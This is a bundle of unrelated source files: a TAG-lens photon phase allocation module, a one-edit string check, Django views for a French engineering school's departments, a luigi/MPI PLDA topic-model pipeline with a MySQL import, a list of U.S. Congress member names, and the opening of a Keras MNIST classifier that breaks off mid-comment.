            self.photons["TAG"] = self.tag_pulses[: self.photons.shape[0]]
    def __preserve_relevant_tag_pulses(self):
        """ Keep only TAG pulses that are in the timeframe of the experiment """
        relevant_tag_pulses = (self.tag_pulses >= self.first_photon) & (
            self.tag_pulses <= self.last_photon
        )
        return self.tag_pulses.loc[relevant_tag_pulses]
@attr.s
class TagPeriodVerifier:
    """ Verify input to the TAG pipeline, and add missing pulses accordingly """
    tag = attr.ib(validator=instance_of(pd.Series))
    last_photon = attr.ib(validator=instance_of(np.uint64))
    freq = attr.ib(default=189e3, validator=instance_of(float))
    binwidth = attr.ib(default=800e-12, validator=instance_of(float))
    jitter = attr.ib(
        default=0.05, validator=instance_of(float)
    )  # Allowed jitter of signal, between 0 - 1
    first_photon = attr.ib(default=np.int64(0), validator=instance_of(np.int64))
    allowed_corruption = attr.ib(default=0.3, validator=instance_of(float))
    success = attr.ib(init=False)  # True when verification completed
    @property
    def period(self):
        # Expected TAG period, expressed in multiscaler bins.
        return int(np.ceil(1 / (self.freq * self.binwidth)))
    @property
    def allowed_noise(self):
        # Maximal deviation (in bins) still treated as a regular pulse.
        return int(np.ceil(self.jitter * self.period))
    def verify(self):
        """ Main script to verify and correct the recorded TAG lens pulses """
        # Find the borders of the disordered periods
        start_idx, end_idx = self.__obtain_start_end_idx()
        # Add \ remove TAG pulses in each period
        if isinstance(start_idx, np.ndarray) and isinstance(end_idx, np.ndarray):
            self.__fix_tag_pulses(start_idx, end_idx)
            self.__add_last_event_manually()
            self.success = True
        else:
            # Too corrupt: __obtain_start_end_idx returned the (-1, -1) sentinel.
            self.success = False
    def __obtain_start_end_idx(self) -> Tuple[np.ndarray, np.ndarray]:
        """ Create two vectors corresponding to the starts and ends of the 'wrong' periods of the TAG lens """
        diffs = self.tag.diff()
        diffs[0] = self.period
        logging.debug(
            "The mean frequency of TAG events is {:0.2f} Hz.".format(
                1 / (np.mean(diffs) * self.binwidth)
            )
        )
        # Mark each inter-pulse gap: 0 == regular, 1 == out-of-phase.
        delta = np.abs(diffs - self.period)
        diffs[delta < self.allowed_noise] = 0  # regular events
        diffs[diffs != 0] = 1
        # Abort when too large a fraction of pulses is out of phase.
        if np.sum(diffs) / len(diffs) > self.allowed_corruption:
            logging.warning(
                f"Over {self.allowed_corruption * 100}% of TAG pulses were out-of-phase."
                " Stopping TAG interpolation."
            )
            return (-1, -1)
        diff_of_diffs = diffs.diff()  # a vec containing 1 at the start
        # of a "bad" period, and -1 at its end
        diff_of_diffs[0] = 0
        starts_and_stops = diff_of_diffs[diff_of_diffs != 0]
        start_idx = starts_and_stops[starts_and_stops == 1].index - 1
        end_idx = starts_and_stops[starts_and_stops == -1].index - 1
        return start_idx.values, end_idx.values
    def __fix_tag_pulses(self, starts: np.ndarray, ends: np.ndarray):
        """ Iterate over the disordered periods and add or remove pulses """
        if len(starts) == 0:  # Nothing to fix
            return
        period = self.period
        items_to_discard = []
        start_iter_at = 0
        # If start contains a 0 - manually add TAG pulses backwards from the
        # first good pulse down to the first photon.
        if starts[0] == 0:
            start_iter_at = 1
            new_ser = pd.Series(
                np.arange(
                    start=self.tag[ends[0]] - period,
                    stop=self.first_photon - 1,
                    step=-period,
                    dtype=np.uint64,
                ),
                dtype=np.uint64,
            )
            self.tag = self.tag.append(new_ser, ignore_index=True).astype(np.uint64)
            items_to_discard.append(np.arange(starts[0], ends[0]))
        jitter = self.jitter
        # Interpolate the remaining bad periods in a compiled loop.
        new_data, returned_items_to_discard = numba_iterate_over_disordered(
            tag=self.tag.values,
            starts=starts[start_iter_at:],
            ends=ends[start_iter_at:],
            period=period,
            jitter=jitter,
        )
        flattened_items_to_discard = list(
            chain.from_iterable(items_to_discard + returned_items_to_discard)
        )
        self.tag.drop(flattened_items_to_discard, inplace=True)
        flattened_new_data = list(chain.from_iterable(new_data))
        self.tag = (
            self.tag.append(
                pd.Series(flattened_new_data, dtype=np.uint64), ignore_index=True
            )
            .sort_values()
            .reset_index(drop=True)
        )
        assert self.tag.dtype == np.uint64
    def __add_last_event_manually(self):
        """ Insert a 'fake' TAG event to encapsulate the last remaining photons """
        last_tag_val = self.tag.values[-1] + self.period
        self.tag = self.tag.append(
            pd.Series(last_tag_val, dtype=np.uint64), ignore_index=True
        )
        assert self.tag.dtype == np.uint64
@attr.s
class TagPhaseAllocator:
    """ Assign a phase to each photon """
    photons = attr.ib(validator=instance_of(pd.DataFrame))
    tag = attr.ib(validator=instance_of(pd.Series))
    pulses_per_period = attr.ib(default=1, validator=instance_of(int))
    to_phase = attr.ib(default=True, validator=instance_of(bool))
    offset = attr.ib(default=0, validator=instance_of(int))
    TAG_DRIVER_OFFSET = attr.ib(default=90, validator=instance_of(int))
    @property
    def offset_rad(self):
        """ Convert degrees to radians """
        return (self.offset + self.TAG_DRIVER_OFFSET) * np.pi / 180
    def allocate_phase(self):
        """ Using Numba functions allocate the proper phase to the photons """
        # Bin each photon between consecutive TAG pulses.
        bin_idx, relevant_bins = numba_digitize(
            self.photons.abs_time.values, self.tag.values
        )
        # Photons arriving after the last pulse have no period — mark irrelevant.
        relevant_bins[bin_idx >= len(self.tag)] = False
        photons = self.photons.abs_time.values.astype(float)
        photons[np.logical_not(relevant_bins)] = np.nan
        relevant_photons = np.compress(relevant_bins, photons)
        phase_vec = numba_find_phase(
            photons=relevant_photons,
            bins=np.compress(relevant_bins, bin_idx),
            raw_tag=self.tag.values,
            to_phase=self.to_phase,
            offset=self.offset_rad,
        )
        if not self.to_phase:
            phase_vec = phase_vec.astype(np.uint16)
        # NOTE(review): this write-back assumes all irrelevant (NaN) photons
        # precede the relevant ones in the array — confirm.
        first_relevant_photon_idx = photons.shape[0] - relevant_photons.shape[0]
        photons[first_relevant_photon_idx:] = phase_vec
        self.photons["Phase"] = photons
        self.photons.dropna(how="any", inplace=True)
        assert self.photons["Phase"].any() >= -1
        assert self.photons["Phase"].any() <= 1
@jit(nopython=True, cache=True)
def numba_digitize(values: np.array, bins: np.array) -> np.array:
    """ Numba'd version of np.digitize; also returns a mask of values past bin 0. """
    digitized = np.digitize(values, bins)
    return digitized, digitized > 0
@jit(nopython=True, cache=True)
def numba_find_phase(
    photons: np.array, bins: np.array, raw_tag: np.array, to_phase: bool, offset: float
) -> np.array:
    """
    Find the phase [0, 2pi) of the photon for each event in `photons`.
    :return np.ndarray: Array with the size of photons containing the phases.
    """
    phase_vec = np.zeros_like(photons, dtype=np.float32)
    tag_diff = np.diff(raw_tag)
    # Linear position of each photon inside its TAG period, in [0, 1).
    for idx, cur_bin in enumerate(bins):  # values of indices that changed
        phase_vec[idx] = (photons[idx] - raw_tag[cur_bin - 1]) / tag_diff[cur_bin - 1]
    if to_phase:
        # Map the linear position onto the sinusoidal axial scan of the TAG lens.
        phase_vec_float = np.sin(phase_vec * 2 * np.pi + offset)
        return phase_vec_float.astype(np.float32)
    return phase_vec.astype(np.float32)
@jit(cache=True)
def numba_iterate_over_disordered(
    tag: np.ndarray, starts: np.ndarray, ends: np.ndarray, period: int, jitter: float
) -> Tuple[List, List]:
    """
    Numba'd version of the main TAG iteration.
    Currently not working in nopython due to some bugs with arange
    """
    new_data = []
    items_to_discard = []
    jitter_int = period * jitter
    row_idx = 1
    for start_idx, end_idx in zip(starts, ends):
        start_val = tag[start_idx]
        end_val = tag[end_idx]
        # Gap wider than one period (plus jitter): synthesize the missing pulses
        # and discard the out-of-phase pulses recorded inside the gap.
        if np.abs(end_val - start_val) - period > jitter_int:
            l = np.arange(end_val - period, start_val, -period, np.uint64)
            new_data.append(l)
            items_to_discard.append(np.arange(start_idx + 1, end_idx))
        row_idx += 1
    return (new_data, items_to_discard)
|
#One Away
import math
# Read the two strings to compare (one per line).
s1 = input().strip()
s2 = input().strip()
def checkEdit(s1 , s2):
    """Return True when s1 and s2 are at most one edit apart.

    An edit is a single insertion, deletion, or replacement of one character.

    Fixes over the original:
    - `math.abs` does not exist; use the builtin abs().
    - with equal lengths, both `long` and `short` picked s2; pick distinct strings.
    - the scan loop never advanced its indices (infinite loop) and never
      returned True; advance the cursors and return the final verdict.
    """
    if abs(len(s1) - len(s2)) > 1:
        return False
    # Scan the longer string against the shorter one (names avoid shadowing
    # the old builtin-clashing `long`).
    longer, shorter = (s1, s2) if len(s1) >= len(s2) else (s2, s1)
    i = j = 0
    found_difference = False
    while i < len(longer) and j < len(shorter):
        if longer[i] != shorter[j]:
            if found_difference:
                return False
            found_difference = True
            # Replacement (equal lengths) consumes a char of both strings;
            # insertion/deletion only advances the longer one.
            if len(longer) == len(shorter):
                j += 1
        else:
            j += 1
        i += 1
    return True
# Report whether the two strings are within one edit of each other.
print(checkEdit(s1 , s2))
|
from django.shortcuts import render,redirect
from django.template import RequestContext
from .models import Chef_departement, Etudiant, Matiere, Professeur
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required(login_url='login')
def deptGit(request):
    """Home page of the GIT (computer science & telecoms) department."""
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/git.html', {'forms': chefs})
@login_required(login_url='login')
def deptGitEns(request):
    """Teachers page of the GIT department."""
    profs = Professeur.objects.filter(departemet__nom_departement='Génie informatique et telecoms')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/enseingnant.html', {'items': profs, 'forms': chefs})
@login_required(login_url='login')
def deptGitMat(request):
    """Courses (matières) page of the GIT department."""
    matieres = Matiere.objects.filter(departemet__nom_departement='Génie informatique et telecoms')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/matiere.html', {'items': matieres, 'forms': chefs})
@login_required(login_url='login')
def deptETDIC1(request):
    """DIC1 students of the GIT department."""
    students = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC1')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/DIC1.html', {'items': students, 'forms': chefs})
@login_required(login_url='login')
def deptETDIC2(request):
    """DIC2 students of the GIT department."""
    students = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC2')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/DIC2.html', {'items': students, 'forms': chefs})
@login_required(login_url='login')
def deptETDIC3(request):
    """DIC3 students of the GIT department."""
    students = Etudiant.objects.filter(departement__nom_departement='Génie informatique et telecoms').filter(classe__nom_classe='DIC3')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie informatique et telecoms')
    return render(request, 'departements/git/DIC3.html', {'items': students, 'forms': chefs})
@login_required(login_url='login')
def deptCivil(request):
    """Home page of the civil engineering department."""
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/civil.html', {'forms': chefs})
@login_required(login_url='login')
def deptCivilEns(request):
    """Teachers page of the civil engineering department."""
    profs = Professeur.objects.filter(departemet__nom_departement='Génie civil')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/enseingnant.html', {'items': profs, 'forms': chefs})
@login_required(login_url='login')
def deptCivilMat(request):
    """Courses (matières) page of the civil engineering department."""
    matieres = Matiere.objects.filter(departemet__nom_departement='Génie civil')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/matiere.html', {'items': matieres, 'forms': chefs})
@login_required(login_url='login')
def deptCETDIC1(request):
    """DIC1 students of the civil engineering department."""
    students = Etudiant.objects.filter(departement__nom_departement='Génie civil').filter(classe__nom_classe='DIC1')
    chefs = Chef_departement.objects.filter(diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/DIC1.html', {'items': students, 'forms': chefs})
@login_required(login_url='login')
def deptCETDIC2(request):
    """Render the DIC2 student roster for the civil-engineering department."""
    students = Etudiant.objects.filter(
        departement__nom_departement='Génie civil'
    ).filter(classe__nom_classe='DIC2')
    dept_heads = Chef_departement.objects.filter(
        diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/DIC2.html',
                  {'items': students, 'forms': dept_heads})
@login_required(login_url='login')
def deptCETDIC3(request):
    """Render the DIC3 student roster for the civil-engineering department."""
    students = Etudiant.objects.filter(
        departement__nom_departement='Génie civil'
    ).filter(classe__nom_classe='DIC3')
    dept_heads = Chef_departement.objects.filter(
        diriger__nom_departement='Génie civil')
    return render(request, 'departements/civil/DIC3.html',
                  {'items': students, 'forms': dept_heads})
# def eleve(request):
# items = EleveIngenieur.objects.all()
# # if request.method=='POST':
# # form = EleveForm(request.POST)
# # if form.is_valid():
# # form.save()
# # return redirect('login')
# # else :
# # form =EleveForm()
# context ={
# 'items':items,
# # 'form':form,
# }
# return render(request,'departements/git.html',context)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# FIX: the shebang read "#!/usr/bin.python" (dot instead of slash), which
# prevented direct execution of the script.
import os, sys, inspect

# Make the parent directory of this script importable as the project root.
pfolder = os.path.realpath(os.path.abspath(os.path.join(
    os.path.split(inspect.getfile(inspect.currentframe()))[0], "..")))
if pfolder not in sys.path:
    sys.path.insert(0, pfolder)

# Python 2 only: force UTF-8 as the default encoding for implicit
# str/unicode conversions (reload/setdefaultencoding no longer exist in
# Python 3 -- this whole module is Python 2 code, see the print statements).
reload(sys)
sys.setdefaultencoding('utf8')
from ConfigParser import SafeConfigParser
from luigi import six
import luigi
import luigi.contrib.hadoop
import luigi.contrib.hdfs
import luigi.contrib.ssh
import socket
from prepare.get_train_data import Training2LDA
from tools.mysql.import_model_view import import_model_view
from tools.view_model import plda_model_view
class PLDA(luigi.Task):
    """Train a PLDA topic model with MPI (mpi_lda) across the mpd ring.

    Python 2 code: relies on `print` statements and SafeConfigParser.
    """
    conf = luigi.Parameter()  # path to the INI configuration file

    def __init__(self, *args, **kwargs):
        luigi.Task.__init__(self, *args, **kwargs)
        # Pull every job setting from the [basic] and [plda+] sections.
        parser = SafeConfigParser()
        parser.read(self.conf)
        root = parser.get("basic", "root")
        self.ssh_user = parser.get("basic", "ssh_user")
        self.ssh_port = parser.get('basic', 'ssh_port')
        self.topic_num = parser.getint('plda+', 'topic_num')
        self.burn_in_iter = parser.getint('plda+', 'plda_burn_in_iter')
        self.total_iter = parser.getint('plda+', 'plda_total_iter')
        self.cpu_core_num = parser.getint('plda+', 'cpu_core_num')
        # Standard LDA heuristic: alpha = 50 / number_of_topics.
        self.alpha = 50.0 / self.topic_num
        self.mf = '%s/data/temp/mf' % root        # MPI machine file (temp)
        self.mpi_plda = '%s/plda/mpi_lda' % root  # trainer binary
        self.plda_model = '%s/data/train/plda.model.txt' % root
        self.plda_model_tmp = self.plda_model + ".tmp"

    def requires(self):
        # Training data must have been converted to LDA format first.
        return [Training2LDA(self.conf)]

    def output(self):
        return luigi.LocalTarget(self.plda_model)

    def run(self):
        # Hosts currently in the MPI ring; bail out silently when none are up.
        mpi_nodes = [node.strip() for node in os.popen('mpdtrace').readlines()]
        if len(mpi_nodes) == 0:
            return
        job_num = len(mpi_nodes) * self.cpu_core_num
        # Machine file: one "<host>:<cores>" line per node.
        with open(self.mf, 'w') as mf_fd:
            for node in mpi_nodes:
                print >> mf_fd, "%s:%d" % (node, self.cpu_core_num)
        localhostname = socket.gethostname()
        # Hostname with the last dot-component stripped, to also match the
        # short form that mpdtrace may report.
        localhostname_ = '.'.join(localhostname.split('.')[0:-1])
        # Copy the training data to every remote node at the same path.
        for node in mpi_nodes:
            if node != localhostname and node != localhostname_:
                rfs = luigi.contrib.ssh.RemoteFileSystem(node, port=self.ssh_port, username=self.ssh_user)
                print "sending %s to %s" % (self.input()[0].fn, node)
                rfs.put(self.input()[0].fn, self.input()[0].fn)
        cmd = '''
        mpiexec -machinefile %s -n %d \
        %s \
        --num_topics %d --alpha %f --beta 0.01 \
        --training_data_file %s \
        --model_file %s \
        --total_iterations %d
        '''
        cmd = cmd % (self.mf, job_num, self.mpi_plda,
                     self.topic_num, self.alpha, self.input()[0].fn,
                     self.plda_model_tmp, self.total_iter)
        os.system(cmd)
        # Remove the machine file, then publish the model via rename so
        # output() only exists after a successful training run.
        if os.path.exists(self.mf):
            os.remove(self.mf)
        if os.path.exists(self.plda_model_tmp):
            os.rename(self.plda_model_tmp, self.output().fn)
class PLDA2Mysql(luigi.Task):
    """Render the trained PLDA model into a view file and import it to MySQL."""
    conf = luigi.Parameter()  # path to the INI configuration file

    def __init__(self, *args, **kwargs):
        luigi.Task.__init__(self, *args, **kwargs)
        parser = SafeConfigParser()
        parser.read(self.conf)
        root = parser.get("basic", "root")
        self.model_view = "%s/data/temp/plda.model.view" % root
        # MySQL connection settings from the [mysql] section.
        self.host = parser.get("mysql", "host")
        self.db = parser.get("mysql", "db")
        self.user = parser.get("mysql", "user")
        self.passwd = parser.get("mysql", "password")

    def requires(self):
        return [PLDA(self.conf)]

    def output(self):
        # NOTE(review): a task with no output is never "complete", so luigi
        # re-runs this import on every invocation -- confirm that is intended.
        return None

    def run(self):
        plda_model_view(self.input()[0].fn, self.model_view)
        import_model_view(self.model_view, self.host, self.db, self.user, self.passwd)
        os.remove(self.model_view)  # the view file is only an intermediate
if __name__ == "__main__":
    # Let luigi's CLI choose the task (PLDA / PLDA2Mysql) and its parameters.
    luigi.run()
|
# Flat list of names of U.S. members of Congress (senators and
# representatives); entries are plain "First Last" strings.
names = ["Sherrod Brown",
"Maria Cantwell",
"Benjamin Cardin",
"Thomas Carper",
"Robert Casey",
"Dianne Feinstein",
"Amy Klobuchar",
"Robert Menendez",
"Bernard Sanders",
"Debbie Stabenow",
"Jon Tester",
"Sheldon Whitehouse",
"John Barrasso",
"Roger Wicker",
"Lamar Alexander",
"Susan Collins",
"John Cornyn",
"Richard Durbin",
"Michael Enzi",
"Lindsey Graham",
"James Inhofe",
"Mitch McConnell",
"Jeff Merkley",
"Jack Reed",
"James Risch",
"Pat Roberts",
"Jeanne Shaheen",
"Tom Udall",
"Mark Warner",
"Kirsten Gillibrand",
"Christopher Coons",
"Joe Manchin III",
"Robert Aderholt",
"Justin Amash",
"Tammy Baldwin",
"Karen Bass",
"Michael Bennet",
"Gus Bilirakis",
"Rob Bishop",
"Sanford Bishop",
"Marsha Blackburn",
"Earl Blumenauer",
"Richard Blumenthal",
"Roy Blunt",
"John Boozman",
"Kevin Brady",
"Mo Brooks",
"Vern Buchanan",
"Larry Bucshon",
"Michael Burgess",
"Richard Burr",
"Butterfield",
"Ken Calvert",
"Shelley Moore Capito",
"Andre Carson",
"John Carter",
"Bill Cassidy",
"Kathy Castor",
"Steve Chabot",
"Judy Chu",
"David Cicilline",
"Yvette Clarke",
"Lacy Clay",
"Emanuel Cleaver",
"James Clyburn",
"Steve Cohen",
"Tom Cole",
"Michael Conaway",
"Gerald Connolly",
"Jim Cooper",
"Jim Costa",
"Joe Courtney",
"Mike Crapo",
"Eric Crawford",
"Henry Cuellar",
"Elijah Cummings",
"Danny Davis",
"Susan Davis",
"Peter DeFazio",
"Diana DeGette",
"Rosa DeLauro",
"Scott DesJarlais",
"Theodore Deutch",
"Mario Diaz-Balart",
"Lloyd Doggett",
"Michael Doyle",
"Jeff Duncan",
"Eliot Engel",
"Anna Eshoo",
"Charles Fleischmann",
"Bill Flores",
"Jeff Fortenberry",
"Virginia Foxx",
"Marcia Fudge",
"John Garamendi",
"Cory Gardner",
"Bob Gibbs",
"Louie Gohmert",
"Paul Gosar",
"Kay Granger",
"Chuck Grassley",
"Sam Graves",
"Tom Graves",
"Al Green",
"Morgan Griffith",
"Raul Grijalva",
"Brett Guthrie",
"Andy Harris",
"Vicky Hartzler",
"Alcee Hastings",
"Martin Heinrich",
"Jaime Herrera Beutler",
"Brian Higgins",
"James Himes",
"Mazie Hirono",
"John Hoeven",
"Steny Hoyer",
"Bill Huizenga",
"Duncan Hunter",
"Johnny Isakson",
"Sheila Jackson Lee",
"Bill Johnson",
"Eddie Bernice Johnson",
"Henry Johnson",
"Ron Johnson",
"Jim Jordan",
"Marcy Kaptur",
"William Keating",
"Mike Kelly",
"Ron Kind",
"Peter King",
"Steve King",
"Adam Kinzinger",
"Doug Lamborn",
"James Langevin",
"James Lankford",
"Rick Larsen",
"John Larson",
"Robert Latta",
"Patrick Leahy",
"Barbara Lee",
"Mike Lee",
"John Lewis",
"Daniel Lipinski",
"David Loebsack",
"Zoe Lofgren",
"Billy Long",
"Nita Lowey",
"Frank Lucas",
"Blaine Luetkemeyer",
"Ben Ray Lujan",
"Stephen Lynch",
"Carolyn Maloney",
"Kenny Marchant",
"Edward Markey",
"Doris Matsui",
"Kevin McCarthy",
"Michael McCaul",
"Tom McClintock",
"Betty McCollum",
"James McGovern",
"Patrick McHenry",
"David McKinley",
"Cathy McMorris Rodgers",
"Jerry McNerney",
"Gregory Meeks",
"Gwen Moore",
"Jerry Moran",
"Lisa Murkowski",
"Christopher Murphy",
"Patty Murray",
"Jerrold Nadler",
"Grace Napolitano",
"Richard Neal",
"Eleanor Holmes Norton",
"Devin Nunes",
"Pete Olson",
"Steven Palazzo",
"Frank Pallone",
"Bill Pascrell",
"Rand Paul",
"Nancy Pelosi",
"Ed Perlmutter",
"Gary Peters",
"Collin Peterson",
"Chellie Pingree",
"Rob Portman",
"Bill Posey",
"David Price",
"Mike Quigley",
"Tom Reed",
"Cedric Richmond",
"Martha Roby",
"David Roe",
"Harold Rogers",
"Mike Rogers",
"Lucille Roybal-Allard",
"Marco Rubio",
"Dutch Ruppersberger",
"Bobby Rush",
"Tim Ryan",
"Gregorio Kilili Camacho Sablan",
"John Sarbanes",
"Steve Scalise",
"Janice Schakowsky",
"Adam Schiff",
"Kurt Schrader",
"Charles Schumer",
"David Schweikert",
"Austin Scott",
"David Scott",
"Robert Scott",
"Tim Scott",
"James Sensenbrenner",
"Jose Serrano",
"Terri Sewell",
"Richard Shelby",
"Brad Sherman",
"John Shimkus",
"Michael Simpson",
"Albio Sires",
"Adam Smith",
"Adrian Smith",
"Christopher Smith",
"Jackie Speier",
"Steve Stivers",
"Linda Sanchez",
"Bennie Thompson",
"Mike Thompson",
"Glenn Thompson",
"Mac Thornberry",
"John Thune",
"Scott Tipton",
"Paul Tonko",
"Patrick Toomey",
"Michael Turner",
"Fred Upton",
"Chris Van Hollen",
"Nydia Velazquez",
"Peter Visclosky",
"Tim Walberg",
"Greg Walden",
"Debbie Wasserman Schultz",
"Maxine Waters",
"Daniel Webster",
"Peter Welch",
"Joe Wilson",
"Frederica Wilson",
"Robert Wittman",
"Steve Womack",
"Rob Woodall",
"Ron Wyden",
"John Yarmuth",
"Don Young",
"Todd Young",
"Mark Amodei",
"Suzanne Bonamici",
"Suzan DelBene",
"Thomas Massie",
"Donald Payne",
"Brian Schatz",
"Bill Foster",
"Dina Titus",
"Tom Cotton",
"Kyrsten Sinema",
"Doug LaMalfa",
"Jared Huffman",
"Ami Bera",
"Paul Cook",
"Eric Swalwell",
"Julia Brownley",
"Tony Cardenas",
"Raul Ruiz",
"Mark Takano",
"Alan Lowenthal",
"Juan Vargas",
"Scott Peters",
"Ted Yoho",
"Lois Frankel",
"Doug Collins",
"Tulsi Gabbard",
"Tammy Duckworth",
"Rodney Davis",
"Cheri Bustos",
"Jackie Walorski",
"Susan Brooks",
"Andy Barr",
"Elizabeth Warren",
"Joseph Kennedy III",
"Angus King",
"Daniel Kildee",
"Ann Wagner",
"Steve Daines",
"Richard Hudson",
"Mark Meadows",
"George Holding",
"Kevin Cramer",
"Deb Fischer",
"Ann Kuster",
"Grace Meng",
"Hakeem Jeffries",
"Sean Patrick Maloney",
"Chris Collins",
"Brad Wenstrup",
"Joyce Beatty",
"David Joyce",
"Markwayne Mullin",
"Scott Perry",
"Matt Cartwright",
"Tom Rice",
"Ted Cruz",
"Randy Weber",
"Joaquin Castro",
"Roger Williams",
"Marc Veasey",
"Filemon Vela",
"Chris Stewart",
"Tim Kaine",
"Derek Kilmer",
"Denny Heck",
"Mark Pocan",
"Robin Kelly",
"Jason Smith",
"Cory Booker",
"Katherine Clark",
"Bradley Byrne",
"Donald Norcross",
"Alma Adams",
"Gary Palmer",
"French Hill",
"Bruce Westerman",
"Ruben Gallego",
"Mark DeSaulnier",
"Pete Aguilar",
"Ted Lieu",
"Norma Torres",
"Ken Buck",
"Earl Carter",
"Jody Hice",
"Barry Loudermilk",
"Rick Allen",
"Mike Bost",
"Ralph Lee Abraham",
"Garret Graves",
"Seth Moulton",
"John Moolenaar",
"Debbie Dingell",
"Brenda Lawrence",
"Tom Emmer",
"David Rouzer",
"Bonnie Watson Coleman",
"Lee Zeldin",
"Kathleen Rice",
"Elise Stefanik",
"John Katko",
"Brendan Boyle",
"John Ratcliffe",
"Will Hurd",
"Brian Babin",
"Donald Beyer",
"Stacey Plaskett",
"Dan Newhouse",
"Glenn Grothman",
"Alexander Mooney",
"Aumua Amata Coleman Radewagen",
"Dan Sullivan",
"David Perdue",
"Joni Ernst",
"Thom Tillis",
"Mike Rounds",
"Mark Walker",
"Ben Sasse",
"Trent Kelly",
"Darin LaHood",
"Warren Davidson",
"James Comer",
"Dwight Evans",
"Kamala Harris",
"John Kennedy",
"Margaret Wood Hassan",
"Catherine Cortez Masto",
"Bradley Scott Schneider",
"Tom O’Halleran",
"Andy Biggs",
"Ro Khanna",
"Jimmy Panetta",
"Salud Carbajal",
"Nanette Diaz Barragan",
"Luis Correa",
"Lisa Blunt Rochester",
"Matt Gaetz",
"Neal Dunn",
"John Rutherford",
"Al Lawson",
"Stephanie Murphy",
"Darren Soto",
"Val Butler Demings",
"Charlie Crist",
"Brian Mast",
"Francis Rooney",
"Drew Ferguson IV",
"Raja Krishnamoorthi",
"Jim Banks",
"Trey Hollingsworth",
"Roger Marshall",
"Clay Higgins",
"Mike Johnson",
"Anthony Brown",
"Jamie Raskin",
"Jack Bergman",
"Paul Mitchell",
"Ted Budd",
"Don Bacon",
"Josh Gottheimer",
"Jacky Rosen",
"Thomas Suozzi",
"Adriano Espaillat",
"Brian Fitzpatrick",
"Lloyd Smucker",
"Jenniffer Gonzalez-Colon",
"David Kustoff",
"Vicente Gonzalez",
"Jodey Arrington",
"Donald McEachin",
"Pramila Jayapal",
"Mike Gallagher",
"Liz Cheney",
"Ron Estes",
"Greg Gianforte",
"Ralph Norman",
"Jimmy Gomez",
"John Curtis",
"Doug Jones",
"Tina Smith",
"Cindy Hyde-Smith",
"Conor Lamb",
"Debbie Lesko",
"Michael Cloud",
"Troy Balderson",
"Kevin Hern",
"Joseph Morelle",
"Mary Gay Scanlon",
"Susan Wild",
"Ed Case",
"Steven Horsford",
"Ann Kirkpatrick",
"Greg Stanton",
"Josh Harder",
"TJ Cox",
"Katie Hill",
"Gilbert Ray Cisneros",
"Katie Porter",
"Harley Rouda",
"Mike Levin",
"Joe Neguse",
"Jason Crow",
"Jahana Hayes",
"Michael Waltz",
"Ross Spano",
"Gregory Steube",
"Debbie Mucarsel-Powell",
"Donna Shalala",
"Lucy McBath",
"Michael San Nicolas",
"Abby Finkenauer",
"Cynthia Axne",
"Russ Fulcher",
"Jesus Garcia",
"Sean Casten",
"Lauren Underwood",
"James Baird",
"Greg Pence",
"Steve Watkins",
"Sharice Davids",
"Lori Trahan",
"Ayanna Pressley",
"David Trone",
"Elissa Slotkin",
"Andy Levin",
"Haley Stevens",
"Rashida Tlaib",
"Jim Hagedorn",
"Angie Craig",
"Dean Phillips",
"Ilhan Omar",
"Pete Stauber",
"Michael Guest",
"Kelly Armstrong",
"Chris Pappas",
"Jefferson Van Drew",
"Andy Kim",
"Tom Malinowski",
"Mikie Sherrill",
"Debra Haaland",
"Xochitl Torres Small",
"Susie Lee",
"Max Rose",
"Alexandria Ocasio-Cortez",
"Antonio Delgado",
"Anthony Brindisi",
"Anthony Gonzalez",
"Kendra Horn",
"Madeleine Dean",
"Chrissy Houlahan",
"Daniel Meuser",
"John Joyce",
"Guy Reschenthaler",
"Joe Cunningham",
"William Timmons IV",
"Dusty Johnson",
"Tim Burchett",
"John Rose",
"Mark Green",
"Dan Crenshaw",
"Van Taylor",
"Lance Gooden",
"Ron Wright",
"Lizzie Fletcher",
"Veronica Escobar",
"Chip Roy",
"Sylvia Garcia",
"Colin Allred",
"Ben McAdams",
"Elaine Luria",
"Denver Riggleman",
"Ben Cline",
"Abigail Davis Spanberger",
"Jennifer Wexton",
"Kim Schrier",
"Bryan Steil",
"Carol Miller",
"Rick Scott",
"Mike Braun",
"Josh Hawley",
"Mitt Romney",
"Martha McSally",
"Jared Golden",
"Fred Keller",
"Dan Bishop",
"Gregory Murphy"]
|
# MNIST digit classifier: builds, trains and saves a small CNN using Keras
# image generators that stream from trainingSet/ and testSet/ directories
# (one sub-directory per digit class).
import tensorflow as tf
from keras.preprocessing.image import ImageDataGenerator
# Training pipeline: rescale pixels to [0, 1] plus light shear/zoom/flip
# augmentation.
train_datagen = ImageDataGenerator(rescale = 1./255,
                                   shear_range = 0.2,
                                   zoom_range = 0.2,
                                   horizontal_flip = True)
# Test images are only rescaled -- never augmented.
test_datagen = ImageDataGenerator(rescale = 1./255)
# 28x28 grayscale batches with one-hot labels.
training_set = train_datagen.flow_from_directory('trainingSet',
                                                 color_mode='grayscale',
                                                 target_size = (28, 28),
                                                 batch_size = 32,
                                                 class_mode = 'categorical')
# NOTE(review): class_mode is omitted here; flow_from_directory's default is
# 'categorical', which matches the training generator -- confirm intended.
test_set = test_datagen.flow_from_directory('testSet',
                                            color_mode='grayscale',
                                            target_size = (28, 28),
                                            batch_size = 32)
from keras.models import Sequential
from keras.layers import Conv2D, MaxPool2D, Flatten, Dense
# Architecture: two conv(32, 3x3) + maxpool stages -> flatten ->
